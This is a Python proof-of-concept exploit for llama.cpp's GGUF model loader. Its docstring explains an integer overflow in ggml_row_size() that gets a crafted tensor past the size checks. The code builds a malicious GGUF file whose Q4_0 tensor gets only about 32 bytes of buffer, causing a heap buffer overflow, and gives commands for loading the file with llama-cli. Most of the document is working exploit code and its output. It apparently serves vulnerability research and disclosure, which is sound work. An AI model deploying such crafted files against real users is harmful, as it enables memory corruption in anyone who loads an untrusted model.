#!/usr/bin/env python3
"""
PoC: Heap Buffer Overflow via Integer Overflow in Tensor Size Calculation
Target: llama.cpp GGUF loading (ggml/src/ggml.c and ggml/src/gguf.cpp)
=== Vulnerability Summary ===
In ggml_row_size() (ggml.c:1275):
size_t ggml_row_size(enum ggml_type type, int64_t ne) {
return ggml_type_size(type)*ne/ggml_blck_size(type);
}
The multiplication `ggml_type_size(type) * ne` is performed in size_t (uint64_t)
arithmetic. When type_size * ne >= 2^64, the product silently wraps modulo 2^64,
producing a much smaller result than intended. The subsequent division by
blck_size then yields a tiny row size.
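A minimal Python model of this wraparound (a sketch, not ggml itself; the function name mirrors the C code, and the Q4_0 constants type_size=18 / blck_size=32 are from the analysis below):

```python
U64_MOD = 1 << 64

def ggml_row_size_u64(type_size: int, blck_size: int, ne: int) -> int:
    # C computes ggml_type_size(type)*ne in size_t first, then divides:
    # the product is reduced mod 2^64 before the division ever happens.
    return ((type_size * ne) % U64_MOD) // blck_size

# 18 * 1024819115206086208 = 2^64 + 128, so the product wraps to 128
# and the row size collapses to 128 // 32 = 4 bytes.
```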
This propagates to:
- ggml_new_tensor_impl() (ggml.c:1686) where data_size is computed
- ggml_nbytes() (ggml.c:1238) where the tensor byte size is computed
- Buffer allocation and data loading code
The overflow check in gguf.cpp (lines 550-552) verifies that the ELEMENT COUNT
(ne[0]*ne[1]*ne[2]*ne[3]) fits in int64_t, but does NOT check that the BYTE SIZE
(element_count * type_size / blck_size) fits in size_t. For quantized types where
type_size > blck_size, the byte size can overflow even when the element count doesn't.
The check at gguf.cpp line 589:
uint64_t(ggml_nelements(&info.t)/ggml_blck_size(info.t.type)) > SIZE_MAX/ggml_type_size(info.t.type)
divides the element count by blck_size BEFORE comparing, i.e. it effectively
validates the product (nelements/blck_size) * type_size. ggml_row_size(), however,
multiplies FIRST: (type_size * nelements) / blck_size. For quantized types the
intermediate product type_size * nelements can wrap around 2^64 even though
(nelements/blck_size) * type_size fits comfortably in size_t, so the check passes
while the actual size computation overflows.
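A small Python sketch contrasting what the gguf.cpp:589 check computes with what ggml_row_size() computes (values are for Q4_0; variable names are illustrative):

```python
SIZE_MAX_64 = (1 << 64) - 1
ne, type_size, blck_size = 1024819115206086208, 18, 32  # Q4_0

# What the check validates: (ne / blck_size) * type_size stays <= SIZE_MAX.
check_fails = (ne // blck_size) > (SIZE_MAX_64 // type_size)  # False -> passes

# What ggml_row_size() actually computes: multiply first, wrapping mod 2^64.
row_size = ((type_size * ne) % (1 << 64)) // blck_size  # tiny, not ~512 PB
```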
=== Exploit Strategy ===
For GGML_TYPE_Q4_0:
- type_size = 18 bytes (sizeof(block_q4_0) = sizeof(ggml_half) + 32/2 = 2 + 16)
- blck_size = 32
We choose ne[0] such that 18 * ne[0] wraps around 2^64 to a tiny value.
ne[0] = 1024819115206086208 (divisible by 32)
Mathematical: 18 * ne[0] = 18446744073709551744 = 2^64 + 128
In uint64: 18 * ne[0] mod 2^64 = 128
After /32: 128 / 32 = 4 bytes (ggml_row_size returns 4!)
Correct: 18 * ne[0] / 32 = 576460752303423492 bytes (~512 PB)
Computed: 4 bytes
Ratio: buffer is 144,115,188,075,855,873x too small!
Validation bypass:
- ne[0] = 1024819115206086208 < INT64_MAX (9223372036854775807) -> passes
- ne[0] > 0 -> passes non-negative check
- ne[0] % 32 == 0 -> passes block alignment check
- ggml_nelements = ne[0] = 1024819115206086208
- nelements/32 = 32025597350190194
- SIZE_MAX/18 = 1024819115206086200
- 32025597350190194 < 1024819115206086200 -> passes byte size check (line 589)!
Result: A tensor is created with ne[0] = 1024819115206086208 elements but backed
by only 4-32 bytes of actual buffer. Any operation that accesses data beyond the
first few bytes triggers a heap buffer overflow.
=== GGUF Binary Format Reference ===
Header:
- Magic: "GGUF" (4 bytes)
- Version: uint32 (3)
- n_tensors: uint64
- n_kv: uint64
KV pairs:
- key: string (uint64 len + chars)
- type: uint32 (GGUF type enum)
- value: type-dependent
Tensor info (per tensor):
- name: string (uint64 len + chars)
- n_dims: uint32
- ne[0..n_dims-1]: int64 each
- type: uint32 (ggml_type enum)
- offset: uint64
Data section: aligned to ctx->alignment (default 32)
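The fixed-size header fields above can be packed and read back with struct (a sketch; the n_kv value 16 is just illustrative, little-endian throughout):

```python
import io
import struct

buf = io.BytesIO()
buf.write(b"GGUF")                # magic
buf.write(struct.pack('<I', 3))   # version
buf.write(struct.pack('<Q', 1))   # n_tensors
buf.write(struct.pack('<Q', 16))  # n_kv

buf.seek(0)
magic = buf.read(4)
version, n_tensors, n_kv = struct.unpack('<IQQ', buf.read(20))
```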
"""
import struct
import sys
import os
# ============================================================
# GGUF constants
# ============================================================
GGUF_MAGIC = b"GGUF"
GGUF_VERSION = 3
# GGUF value types
GGUF_TYPE_UINT8 = 0
GGUF_TYPE_INT8 = 1
GGUF_TYPE_UINT16 = 2
GGUF_TYPE_INT16 = 3
GGUF_TYPE_UINT32 = 4
GGUF_TYPE_INT32 = 5
GGUF_TYPE_FLOAT32 = 6
GGUF_TYPE_BOOL = 7
GGUF_TYPE_STRING = 8
GGUF_TYPE_ARRAY = 9
GGUF_TYPE_UINT64 = 10
GGUF_TYPE_INT64 = 11
GGUF_TYPE_FLOAT64 = 12
# ggml_type enum values
GGML_TYPE_F32 = 0
GGML_TYPE_F16 = 1
GGML_TYPE_Q4_0 = 2
GGML_TYPE_Q4_1 = 3
GGML_TYPE_Q5_0 = 6
GGML_TYPE_Q5_1 = 7
GGML_TYPE_Q8_0 = 8
GGML_TYPE_I8 = 24
GGML_TYPE_I32 = 26
# Q4_0 type properties
Q4_0_TYPE_SIZE = 18 # sizeof(block_q4_0) = sizeof(ggml_half) + QK4_0/2 = 2 + 16
Q4_0_BLCK_SIZE = 32 # QK4_0
INT64_MAX = (1 << 63) - 1
UINT64_MAX = (1 << 64) - 1
SIZE_MAX = UINT64_MAX # 64-bit platform
GGML_DEFAULT_ALIGNMENT = 32
# ============================================================
# Helper functions
# ============================================================
def write_string(f, s):
"""Write a GGUF string: uint64 length + chars (no null terminator)"""
encoded = s.encode('utf-8')
f.write(struct.pack('<Q', len(encoded)))
f.write(encoded)
def write_kv_string(f, key, value):
"""Write a KV pair with string value"""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_STRING))
write_string(f, value)
def write_kv_uint32(f, key, value):
"""Write a KV pair with uint32 value"""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_UINT32))
f.write(struct.pack('<I', value))
def write_kv_float32(f, key, value):
"""Write a KV pair with float32 value"""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
f.write(struct.pack('<f', value))
def write_kv_string_array(f, key, values):
"""Write a KV pair with string array value"""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
f.write(struct.pack('<I', GGUF_TYPE_STRING))
f.write(struct.pack('<Q', len(values)))
for v in values:
write_string(f, v)
def write_kv_float32_array(f, key, values):
"""Write a KV pair with float32 array value"""
write_string(f, key)
f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
f.write(struct.pack('<I', GGUF_TYPE_FLOAT32))
f.write(struct.pack('<Q', len(values)))
for v in values:
f.write(struct.pack('<f', v))
def write_tensor_info(f, name, n_dims, ne_list, ggml_type, offset):
"""Write a single tensor info entry"""
write_string(f, name)
f.write(struct.pack('<I', n_dims))
for i in range(n_dims):
f.write(struct.pack('<q', ne_list[i])) # int64_t (signed)
f.write(struct.pack('<I', ggml_type))
f.write(struct.pack('<Q', offset))
# ============================================================
# Overflow calculation and verification
# ============================================================
def compute_overflow_ne0():
"""
Find ne[0] for Q4_0 type such that:
- ne[0] is positive and fits in int64_t (< 2^63)
- ne[0] is divisible by blck_size (32)
- 18 * ne[0] overflows uint64_t to a very small value
- All GGUF validation checks pass
We solve: 18 * ne[0] = k * 2^64 + remainder
For k=1: ne[0] = (2^64 + remainder) / 18
We want remainder to be small and divisible by 32 (so that
ggml_row_size = remainder/32 is small).
18 * ne[0] = 2^64 + 128 (remainder=128, 128/32=4)
ne[0] = (2^64 + 128) / 18 = 1024819115206086208
"""
type_size = Q4_0_TYPE_SIZE # 18
blck_size = Q4_0_BLCK_SIZE # 32
# We want: type_size * ne0 = 2^64 + target_remainder
# Choose target_remainder = 128 (divisible by 32, gives row_size of 4)
target_remainder = 128
target_product = (1 << 64) + target_remainder
if target_product % type_size != 0:
raise ValueError(f"Cannot find exact ne[0]: {target_product} not divisible by {type_size}")
ne0 = target_product // type_size
assert ne0 * type_size == target_product, "Arithmetic check failed"
# Verify ne0 is divisible by blck_size
assert ne0 % blck_size == 0, f"ne[0]={ne0} not divisible by blck_size={blck_size}"
# Verify ne0 fits in int64_t
assert 0 < ne0 < (1 << 63), f"ne[0]={ne0} does not fit in int64_t"
return ne0
def verify_overflow(ne0, ne1=1, ne2=1, ne3=1):
"""Verify that the chosen dimensions bypass all checks and cause overflow"""
type_size = Q4_0_TYPE_SIZE
blck_size = Q4_0_BLCK_SIZE
print(f"\n{'='*70}")
print("OVERFLOW ANALYSIS")
print(f"{'='*70}")
print(f"Type: Q4_0 (type_size={type_size}, blck_size={blck_size})")
print(f"Dimensions: ne[0]={ne0}, ne[1]={ne1}, ne[2]={ne2}, ne[3]={ne3}")
print()
# Check 1: gguf.cpp line 540-546 - non-negative check
assert ne0 >= 0 and ne1 >= 0 and ne2 >= 0 and ne3 >= 0
print("[PASS] All ne[j] >= 0 (non-negative check)")
# Check 2: gguf.cpp line 550-552 - overflow check
# INT64_MAX/ne[1] <= ne[0] -> must be FALSE to pass
check1 = INT64_MAX // ne1 <= ne0
print(f" Check 1: INT64_MAX/ne[1] = {INT64_MAX // ne1} <= ne[0] = {ne0} ? {check1}")
assert not check1, "Failed overflow check 1!"
# INT64_MAX/ne[2] <= ne[0]*ne[1] -> must be FALSE
prod01 = ne0 * ne1 # Safe in Python (arbitrary precision)
assert prod01 < (1 << 63), f"ne[0]*ne[1] = {prod01} overflows int64_t!"
check2 = INT64_MAX // ne2 <= prod01
print(f" Check 2: INT64_MAX/ne[2] = {INT64_MAX // ne2} <= ne[0]*ne[1] = {prod01} ? {check2}")
assert not check2, "Failed overflow check 2!"
# INT64_MAX/ne[3] <= ne[0]*ne[1]*ne[2] -> must be FALSE
prod012 = prod01 * ne2
assert prod012 < (1 << 63), f"ne[0]*ne[1]*ne[2] = {prod012} overflows int64_t!"
check3 = INT64_MAX // ne3 <= prod012
print(f" Check 3: INT64_MAX/ne[3] = {INT64_MAX // ne3} <= ne[0]*ne[1]*ne[2] = {prod012} ? {check3}")
assert not check3, "Failed overflow check 3!"
print("[PASS] Overflow check at gguf.cpp:550-552 bypassed")
# Check 3: gguf.cpp line 580 - block alignment
assert ne0 % blck_size == 0
print(f"[PASS] ne[0] % blck_size == 0 (block alignment check)")
# Check 4: gguf.cpp line 589 - byte size representable
nelements = ne0 * ne1 * ne2 * ne3
assert nelements < (1 << 63), "ggml_nelements overflows int64_t!"
lhs = nelements // blck_size # uint64_t(ggml_nelements/blck_size)
rhs = SIZE_MAX // type_size # SIZE_MAX/type_size
byte_check = lhs > rhs
print(f" Byte size check: nelements/blck_size = {lhs} > SIZE_MAX/type_size = {rhs} ? {byte_check}")
assert not byte_check, "Failed byte size check!"
print("[PASS] Byte size check at gguf.cpp:589 bypassed")
# Now compute the ACTUAL overflow
print(f"\n{'='*70}")
print("SIZE COMPUTATION (showing the overflow)")
print(f"{'='*70}")
# ggml_row_size(Q4_0, ne[0]) = type_size * ne[0] / blck_size
true_product = type_size * ne0
wrapped_product = true_product % (1 << 64) # uint64_t wrap
row_size_overflowed = wrapped_product // blck_size
row_size_correct = true_product // blck_size
print(f"\nggml_row_size computation:")
print(f" type_size * ne[0] = {true_product}")
print(f" = 2^64 * {true_product // (1 << 64)} + {true_product % (1 << 64)}")
print(f" In uint64_t (mod 2^64): {wrapped_product}")
print(f" After / blck_size: {row_size_overflowed} bytes <-- OVERFLOWED!")
print(f" Correct value: {row_size_correct} bytes")
    print(f" Overflow factor: {row_size_correct // row_size_overflowed}x too small!")
# data_size computation
data_size = row_size_overflowed
for dim in [ne1, ne2, ne3]:
if dim > 1:
data_size = (data_size * dim) % (1 << 64)
correct_size = row_size_correct * ne1 * ne2 * ne3
print(f"\ndata_size (ggml_new_tensor_impl):")
    print(f" Computed: {data_size} bytes")
print(f" Correct: {correct_size} bytes ({correct_size / (1024**5):.1f} PB)")
# ggml_nbytes computation
# For quantized: nbytes = ne[0]*nb[0]/blck_size + sum((ne[i]-1)*nb[i])
nb0 = type_size # = 18
nb1 = type_size * (ne0 // blck_size) # This doesn't overflow because ne0/32 is reasonable
nb2 = nb1 * ne1
nb3 = nb2 * ne2
# ne[0] * nb[0] overflows!
ne0_nb0_true = ne0 * nb0
ne0_nb0_wrapped = ne0_nb0_true % (1 << 64)
nbytes_first = ne0_nb0_wrapped // blck_size
nbytes = nbytes_first
if ne1 > 1:
nbytes += (ne1 - 1) * nb1
if ne2 > 1:
nbytes += (ne2 - 1) * nb2
if ne3 > 1:
nbytes += (ne3 - 1) * nb3
nbytes_correct = correct_size
print(f"\nggml_nbytes:")
print(f" ne[0]*nb[0] = {ne0} * {nb0} = {ne0_nb0_true}")
print(f" In uint64_t: {ne0_nb0_wrapped}")
print(f" / blck_size: {nbytes_first}")
print(f" + stride terms: {nbytes - nbytes_first}")
print(f" Total nbytes: {nbytes} bytes")
print(f" Correct value: {nbytes_correct} bytes")
# What gets allocated vs what the tensor "thinks" it has
padded = ((nbytes + GGML_DEFAULT_ALIGNMENT - 1) // GGML_DEFAULT_ALIGNMENT) * GGML_DEFAULT_ALIGNMENT
print(f"\n{'='*70}")
print("HEAP BUFFER OVERFLOW")
print(f"{'='*70}")
print(f" Buffer allocated: {padded} bytes (GGML_PAD({nbytes}, {GGML_DEFAULT_ALIGNMENT}))")
print(f" Tensor logical size: {nbytes_correct} bytes")
print(f" Overflow: {nbytes_correct - padded} bytes beyond allocation")
print(f" Stride nb[1]: {nb1} bytes (distance between rows)")
print(f" Any access to row 1+ is {nb1 - padded} bytes out of bounds!")
return data_size, nbytes, padded
def create_poc_gguf(output_path):
"""
Create a GGUF file with a tensor whose dimensions cause integer overflow
in ggml_row_size(), resulting in a tiny buffer allocation for what should
be an enormous tensor.
"""
ne0 = compute_overflow_ne0()
ne1 = 1 # Keep simple - 1D tensor is enough to trigger the overflow
ne2 = 1
ne3 = 1
data_size, nbytes, padded_size = verify_overflow(ne0, ne1, ne2, ne3)
# ---- Build the GGUF file ----
# Metadata KV pairs needed for llama.cpp to proceed with loading
# Tensors: one tensor with overflow-inducing dimensions
# Use a name that llama.cpp expects for a llama model
tensor_name = "token_embd.weight"
n_tensors = 1
print(f"\n{'='*70}")
print("GENERATING GGUF FILE")
print(f"{'='*70}")
print(f" Tensor: '{tensor_name}'")
print(f" Type: Q4_0 (type_size=18, blck_size=32)")
print(f" Dimensions: ne[0]={ne0}")
print(f" Tensor data in file: {padded_size} bytes (the overflowed/small size)")
print(f" Output: {output_path}")
with open(output_path, 'wb') as f:
# ---- GGUF Header ----
f.write(GGUF_MAGIC)
f.write(struct.pack('<I', GGUF_VERSION))
f.write(struct.pack('<Q', n_tensors))
# Minimal token vocabulary (just 4 tokens: UNK, BOS, EOS, and a word)
vocab_tokens = ["<unk>", "<s>", "</s>", "hello"]
vocab_scores = [0.0, 0.0, 0.0, -1.0]
        vocab_types = [0, 3, 3, 1]  # 0=UNDEFINED, 3=CONTROL, 1=NORMAL (llama token type enum)
# Count KV pairs: 13 scalar + 3 array = 16
n_kv = 16
f.write(struct.pack('<Q', n_kv))
# ---- Write scalar KV pairs ----
write_kv_string(f, "general.architecture", "llama")
write_kv_string(f, "general.name", "overflow-poc")
write_kv_uint32(f, "llama.context_length", 2048)
write_kv_uint32(f, "llama.embedding_length", 4096)
write_kv_uint32(f, "llama.block_count", 1)
write_kv_uint32(f, "llama.feed_forward_length", 11008)
write_kv_uint32(f, "llama.attention.head_count", 32)
write_kv_uint32(f, "llama.attention.head_count_kv", 32)
write_kv_float32(f, "llama.rope.freq_base", 10000.0)
write_kv_float32(f, "llama.attention.layer_norm_rms_epsilon", 1e-5)
write_kv_string(f, "tokenizer.ggml.model", "llama")
write_kv_uint32(f, "tokenizer.ggml.bos_token_id", 1)
write_kv_uint32(f, "tokenizer.ggml.eos_token_id", 2)
# ---- Write array KV pairs (tokenizer vocab) ----
write_kv_string_array(f, "tokenizer.ggml.tokens", vocab_tokens)
write_kv_float32_array(f, "tokenizer.ggml.scores", vocab_scores)
# token types: int32 array
write_string(f, "tokenizer.ggml.token_type")
f.write(struct.pack('<I', GGUF_TYPE_ARRAY))
f.write(struct.pack('<I', GGUF_TYPE_INT32))
f.write(struct.pack('<Q', len(vocab_types)))
for t in vocab_types:
f.write(struct.pack('<i', t))
# ---- Write Tensor Info ----
# Tensor: 1D Q4_0 tensor with overflow-inducing ne[0]
write_tensor_info(f, tensor_name, 1, [ne0], GGML_TYPE_Q4_0, 0)
# ---- Align to data section ----
current_pos = f.tell()
aligned_pos = ((current_pos + GGML_DEFAULT_ALIGNMENT - 1) // GGML_DEFAULT_ALIGNMENT) * GGML_DEFAULT_ALIGNMENT
padding_needed = aligned_pos - current_pos
if padding_needed > 0:
f.write(b'\x00' * padding_needed)
# ---- Write tensor data ----
# Write exactly padded_size bytes of tensor data (the overflowed small amount)
# In practice, filling with a recognizable pattern helps identify OOB reads
tensor_data = b'\xAA' * padded_size
f.write(tensor_data)
file_size = os.path.getsize(output_path)
print(f" File size: {file_size} bytes")
print(f"\n[+] GGUF file written successfully")
return output_path
def main():
output_dir = "/Users/eltarne/Documents/script/gguf_poc"
os.makedirs(output_dir, exist_ok=True)
output_path = os.path.join(output_dir, "poc_tensor_overflow.gguf")
print("=" * 70)
print("PoC: Integer Overflow in Tensor Size Calculation (GGUF)")
print("Target: llama.cpp ggml_row_size() / ggml_nbytes()")
print("=" * 70)
# Step 1: Compute the overflow-inducing dimension
ne0 = compute_overflow_ne0()
print(f"\n[+] Found overflow-inducing ne[0] = {ne0}")
print(f" = 0x{ne0:016X}")
print(f" Fits in int64_t: {ne0 < (1 << 63)}")
print(f" Divisible by 32: {ne0 % 32 == 0}")
# Step 2: Verify all checks are bypassed
print(f"\n[+] Verifying validation bypass and computing overflow...")
# Step 3: Create the GGUF file
create_poc_gguf(output_path)
# Step 4: Instructions
print(f"\n{'='*70}")
print("EXPLOITATION")
print(f"{'='*70}")
print(f"""
When llama.cpp loads this GGUF file:
1. gguf_init_from_file() reads tensor info:
- ne[0] = {ne0}
- type = Q4_0 (type_size=18, blck_size=32)
- All validation checks PASS (see analysis above)
2. ggml_nbytes() computes tensor size:
- ne[0] * nb[0] = {ne0} * 18 = {ne0 * 18}
- In uint64_t: {(ne0 * 18) % (1 << 64)} (OVERFLOWED!)
- Result: {((ne0 * 18) % (1 << 64)) // 32} bytes instead of {ne0 * 18 // 32}
3. Buffer allocation uses the tiny overflowed size
-> Only {(((ne0 * 18) % (1 << 64)) // 32 + 31) // 32 * 32} bytes allocated
4. Tensor metadata says ne[0]={ne0} with stride nb[1]={18 * (ne0 // 32)}
-> Any access beyond first few bytes is a HEAP BUFFER OVERFLOW
To test with llama-cli (demonstrates GGUF validation bypass):
cd /Users/eltarne/Documents/script/llama.cpp/build/bin
./llama-cli -m {output_path} -p 'hello' 2>&1
# Note: llama-cli rejects at model-level shape check, but GGUF parsing passes
To test with the C test harness (demonstrates the actual overflow):
cd /Users/eltarne/Documents/script/gguf_poc
./test_tensor_overflow poc_tensor_overflow.gguf
# Shows: ggml_nbytes=4 for tensor with 10^18 elements -> HEAP BUFFER OVERFLOW
""")
if __name__ == "__main__":
main()